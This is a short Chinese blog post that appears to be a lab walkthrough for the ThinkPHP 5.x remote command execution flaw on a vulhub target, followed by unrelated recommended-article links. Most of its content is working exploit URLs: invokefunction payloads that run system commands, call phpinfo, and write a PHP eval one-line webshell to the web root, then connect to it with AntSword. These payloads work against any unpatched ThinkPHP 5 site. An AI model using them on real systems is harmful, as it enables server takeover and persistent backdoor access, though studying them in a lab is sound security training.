Thinkphp5x远程命令执行 靶场攻略

2407-2 shw2024-09-24 17:30

环境配置

云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://47.113.231.0:8080/

2.远程命令执⾏

POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=whoami

3.远程代码执行

POC:
?
s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

4.写入一句话木马到根目录下的shw.php

POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" > shw.php

5.蚁剑连接

相关推荐
寰宇软件1 小时前
PHP企业IM客服系统
微信小程序·vue·php·uniapp
嵌入式小强工作室4 小时前
esp32实现联网控制
开发语言·php
希望奇迹很安静5 小时前
[极客大挑战 2019]PHP
开发语言·学习·web安全·php·ctf·buuctf
很酷的站长8 小时前
怎么创建一个能在线测试php的html5网页?
开发语言·php·html5
Aimin20229 小时前
Debian 上安装PHP
linux·debian·php
vortex59 小时前
正则表达式基础与应用
正则表达式·php
互联网动态分析15 小时前
PHP:从入门到进阶的全方位指南
php
YUJIANYUE17 小时前
PHP版接口调试工具(自定义GET|POST|COOKIE|HEADER|User Agent|来路Referer)
android·开发语言·php
新知图书17 小时前
ThinkPHP 8的多对多关联
php·thinkphp
程序员老卢19 小时前
PHP函数
开发语言·php
热门推荐
01Windows10安装PCL1.14.0及点云配准02(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04Dell服务器升级ubuntu 22.04失败解决05密码学原理技术-第六章-introduction to pulibc-key cryptography06优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间07leetcode - 1769. Minimum Number of Operations to Move All Balls to Each Box08centos7 init.d 和system.d09渗透测试之SQLMAP工具详解 kali自带SQLmap解释 重点sqlmap --tamper 使用方式详解 搞完你就很nice了10小米路由器简单救砖